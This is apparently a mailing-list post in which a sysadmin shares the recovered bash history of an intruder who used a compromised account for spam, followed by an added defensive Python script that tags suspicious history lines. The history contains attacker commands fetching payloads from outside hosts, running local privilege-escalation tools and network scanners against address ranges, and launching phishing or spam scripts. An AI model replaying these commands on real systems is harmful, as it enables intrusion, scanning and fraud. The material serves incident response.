I recently noticed that a system I am responsible for was sending out a bunch of spam messages. I logged into it and sure enough it was a cracked user account which was responsible. I immediately locked down SSHD to certain users with strong passwords (should have done this before, I know), killed the offending processes and looked for replaced executables. Fortunately, the "hacker" (more like script kiddie) was not able to get access to root by the look of it. Also they managed to not delete their .bash_history file. It appears the programs he was downloading and running were meant to brute force crack passwords and look for Samba vulnerabilities. The system definitely is not sending any more spam but I am not convinced that I have undone everything that was done. Take a look at the bash history and let me know what you think.

## BEGIN BASH HISTORY
./scan 12.120
./scan 12.121
./scan 12.106
./scan 12.108
ps ax
pwd
cd ..
ls
rm -rf fuckers/ own.tgz www.pdf .t
ls
ls la
ls -la
passwd
w
uname -a
cd /tmp
wget
wget cbac.3x.ro/www/www.pdf
tar xzvf www.pdf
cd .t
./aVe
./ave
./aVe
./elflbl
./elflbl
w
php -v
cd /tmp
ps ax
uname -a
cd /tmp
wget toxic.sapte.ro/own.tgz
tar xzvf own.tgz
cd fuckers/
./scan 129.2
ls
rm -rf 129.* 69.* vuln.txt
lks
l
ls
screen
screen -r
killall -9 screen
screen -wipe
ls
pwd
cd ..
ls
sendmail
qmail
ps ax
killall -9 elflbl
ps ax
wget
w
cd /tmp
ls
cd /dev/shm
ls
mkdir a
rm -rf a
wget
wget ftp://mihaita:alwayssprite@mihaita.netfirms.com/www/nt.tar
wget ftp://mihaita:alwayssprite@mihaita.netfirms.com/cgi-bin/nt.tar
tar xzvf nt.tar
cd nt
ls
./ss 150.0.0.0/16
./s 150.0.0.0/16
screen
cd /tmp
php -v
wget
scp vpopmail at 203.197.97.162:/tmp/sc.tgz /tmp
screen -r
tar xzvf sc.tgz
cd .Chase/
php chase.php list.txt
ps ax
screen -r
cd /tmp
ls
cd .Chase/
ls
scp test at 220.117.204.90:/tmp/a/a3.txt /tmp/.Chase/
scp test at 220.117.204.90:/tmp/a/a4.txt /tmp/.Chase
mv a3.txt list.txt
cat a4.txt >> list.txt
rm -rf a4.txt
screen
ps ax
screen =-r
screen -r
screen -r 24034
screen -r 9718
screen -r 9718
cd /tmp
cd .Chase/
ls
rm -rf list.txt
ls
rm -rf list.txt
scp test at 220.117.204.90:/tmp/a/mihai2.txt /tmp/.Chase/
pico mihai2.txt
nano mihai2.txt
scp test at 220.117.204.90:/tmp/a/mihai.txt /tmp/.Chase/
nano mihai.txt
mv mihai.txt list.txt
cat mihai2.txt >> list.txt
rm -rf mihai2.txt
screen -r 9718
screen -r
screen -r 24034.pts-0.ndxmail
screen -r
screen -r 24034.pts-0.ndxmail
curl --help
cd /tmp
ls
wget ftp://ciungu:123qwe@ciungu.netfirms.com/www/Linuxvld.tgz
tar xzvf Linuxvld.tgz
ls
cd validator/
ls
rm -rf invalide.txt valide.txt
./validator.sh
ls
rm -rf invalide.txt list.txt valide.txt
ls
ftp
php chase.php list.txt
php chase.php list.txt
cd /dev/shm
ls
cd /tmp
cd validator/
ls
ls -la
ls
mv l25.txt list.txt
ls
screen -r
screen -r 9718.pts-0.ndxmail
kill -9 9718
screen -r
ls
screen
screen -r
screen -r 14426.pts-0.ndxmail
/tmp
cd v
cd /dev/shm
cd va
ls
cd /tmp[
ls
cd /tmp
ls
cd validator/
ls
nano valide.txt
screen -r
screen -r 14426.pts-0.ndxmail
cd /v
cd /derbv/sjhm
cd /dev/shm
ls
cd /tymp
cd /tmp
cd validator/
ls
nano valide.txt
screen -r
screen -r 14426.pts-0.ndxmail
cd /tmp
cd l
ls
cd validator/
ls
nano valide.txt
mv valide.txt s4.txt
ftp
ls
rm -rf s4.txt list.txt invalide.txt
./validator.sh
w
who -q
cd /tmp
ls -la
screen -r
screen -r 24034.pts-0.ndxmail
screen -r 14426.pts-0.ndxmail
kill -9 14426.pts-0.ndxmail
ls
kill -9 14426
ls
ls -la
scp test at 220.117.204.90:/tmp/send.tgz /tmp
tar xzvf send.tgz
cd .Ss
rm -rf lis
cd .SS
rm -rf list.txt
scp root at 200.168.58.88:/tmp/.SS/list.txt /tmp/.SS/
screen
ps ax
php paypal.php lu
php paypal.php list.txt
w
screen -r
screen -r 24034.pts-0.ndxmail
screen -r 24064.pts-0.ndxmail
kill -9 24064
cd /tmp
wget talentat.100free.com/w00t.tgz
ftp
ftp
ls
www.geocities.com/jbj20_01/w00t.tgz
wget www.geocities.com/jbj20_01/w00t.tgz
tar xzvf w00t.tgz
cd w00t
ls
./auto
./auto
ls
./auto
chmod +x 209
./209
./asmb 64.251
cd /tmp
cd ww
cd wq
cd w00t
ls
screen -r
screen 12.106.4.204
ls
cd ..
ls
ftp
screen -r
screen -r 24034.pts-0.ndxmail
screen -r 13181.pts-0.ndxmail
kill -9 13181
./s 150.0.0.0/16
./s 150.80.0.0/16
./s 150.140.0.0/16
./scan 164.20.0.0/16
./s 164.20.0.0/16
./s 164.80.0.0/16
./s 164.90.0.0/16
./s 164.100.0.0/16
## END BASH HISTORY

-- 
Loren H. Burlingame <loren at lhb.name>
GPG Key ID: 0x112DCF4F
"Irony can be pretty ironic sometimes." -William Shatner (a.k.a. Buck Murdock)
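The post asks a reader to eyeball a long recovered .bash_history for what the intruder did. The script below is an added example for that triage step; it is not the poster's code or any tool from the thread. It tags each history line with the indicator categories a responder cares about (payload downloads, archive extraction, execution from scratch directories, hidden working directories, scans against address ranges, scp transfers from outside hosts, cleanup and process control) and collects every external host contacted, which is the list you would check against firewall, proxy and netflow logs and hand to abuse contacts. The sample history is constructed to mirror the shape of the one in the post, including the list's "user at host" obfuscation in scp lines; the hostnames and addresses are placeholders (example.invalid, RFC 5737 ranges), not the real ones above.

```python
"""Triage helper for a recovered .bash_history after a user-account compromise.

Added example (not from the original post). Every tag name and the sample
history are this example's own assumptions; adjust DOWNLOADERS / SCRATCH_DIRS
to the box under investigation.
"""
import re
from collections import Counter

SCRATCH_DIRS = ("/tmp", "/dev/shm", "/var/tmp")          # world-writable staging areas
DOWNLOADERS = ("wget", "curl", "ftp", "lynx", "fetch")     # commands that pull payloads in
ARCHIVE_RE = re.compile(r"\btar\s+\S*x\S*\s+(\S+)")        # tar with an extract flag
RANGE_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){1,3}(?:/\d{1,2})?\b")  # 12.120, 150.0.0.0/16
# host part of a URL-ish token: optional scheme, optional user:pass@, then IP or FQDN
URL_HOST_RE = re.compile(
    r"(?:https?://|ftp://)?(?:[^@\s]+@)?"
    r"((?:\d{1,3}(?:\.\d{1,3}){3})|[A-Za-z0-9.-]+\.[A-Za-z]{2,})(?:[/:]|$)"
)
SCP_REMOTE_RE = re.compile(r"\bscp\b.*?(\d{1,3}(?:\.\d{1,3}){3}):")  # "scp user at IP:path"


def classify(cmd):
    """Return the set of indicator tags that apply to one history line."""
    tags = set()
    argv = cmd.split()
    if not argv:
        return tags
    prog = argv[0]
    if prog in DOWNLOADERS and len(argv) > 1:
        tags.add("download")
    if prog == "scp" and SCP_REMOTE_RE.search(cmd):
        tags.add("remote-copy")
    if ARCHIVE_RE.search(cmd):
        tags.add("extract")
    if prog.startswith("./"):
        tags.add("exec-local")
        # a locally-dropped binary given an IP prefix or CIDR is a scanner run
        if RANGE_RE.search(cmd[len(prog):]):
            tags.add("scan")
    if prog == "chmod" and "+x" in argv:
        tags.add("make-executable")
    if prog == "cd" and len(argv) > 1:
        if argv[1].startswith(SCRATCH_DIRS):
            tags.add("scratch-dir")
        if argv[1].strip("/").split("/")[-1].startswith("."):
            tags.add("hidden-dir")
    if prog == "rm" and "-rf" in argv:
        tags.add("cleanup")
    if prog in ("kill", "killall"):
        tags.add("process-control")
    return tags


def external_hosts(cmd):
    """Hostnames / IPs a command reaches out to: download sources and scp peers."""
    found = set()
    argv = cmd.split()
    if argv and argv[0] in DOWNLOADERS:
        for tok in argv[1:]:
            m = URL_HOST_RE.match(tok)
            if m:
                found.add(m.group(1))
    found.update(SCP_REMOTE_RE.findall(cmd))
    return found


def triage(history):
    """Tag every line; return (tagged lines, tag counts, external hosts)."""
    tagged, counts, hosts = [], Counter(), set()
    for n, line in enumerate(history, 1):
        line = line.strip()
        tags = classify(line)
        if tags:
            tagged.append((n, line, sorted(tags)))
            counts.update(tags)
        hosts.update(external_hosts(line))
    return tagged, counts, hosts


# Constructed sample history modelled on the post (placeholder hosts/addresses).
SAMPLE_HISTORY = """\
ps ax
cd /tmp
wget files.example.invalid/www/www.pdf
tar xzvf www.pdf
cd .t
./elflbl
cd /dev/shm
wget ftp://user:pw@drop.example.invalid/www/nt.tar
tar xzvf nt.tar
cd nt
./s 192.0.2.0/24
scp test at 198.51.100.7:/tmp/a/a3.txt /tmp/.Chase/
php chase.php list.txt
chmod +x 209
./209
kill -9 9718
rm -rf list.txt
""".splitlines()

if __name__ == "__main__":
    tagged, counts, hosts = triage(SAMPLE_HISTORY)
    for n, line, tags in tagged:
        print(f"{n:4d}  {','.join(tags):30s} {line}")
    print("\ntag counts:", dict(counts))
    print("external hosts to check in firewall/proxy/netflow logs:", sorted(hosts))
```

Run it against the real file with `triage(open("/home/USER/.bash_history").read().splitlines())`; the "download" and "remote-copy" lines tell you what was fetched and from where, "extract" plus "scratch-dir" and "hidden-dir" tell you which directories to image before cleaning, and "scan" lines show which outside ranges the box was used against, which is what abuse reports to the owners of those ranges will be about. The tagging is deliberately coarse: it is a reading aid for the responder, not a verdict, and a line with no tag (such as the `php chase.php` invocation in the sample) still deserves a look when it runs something from a scratch directory.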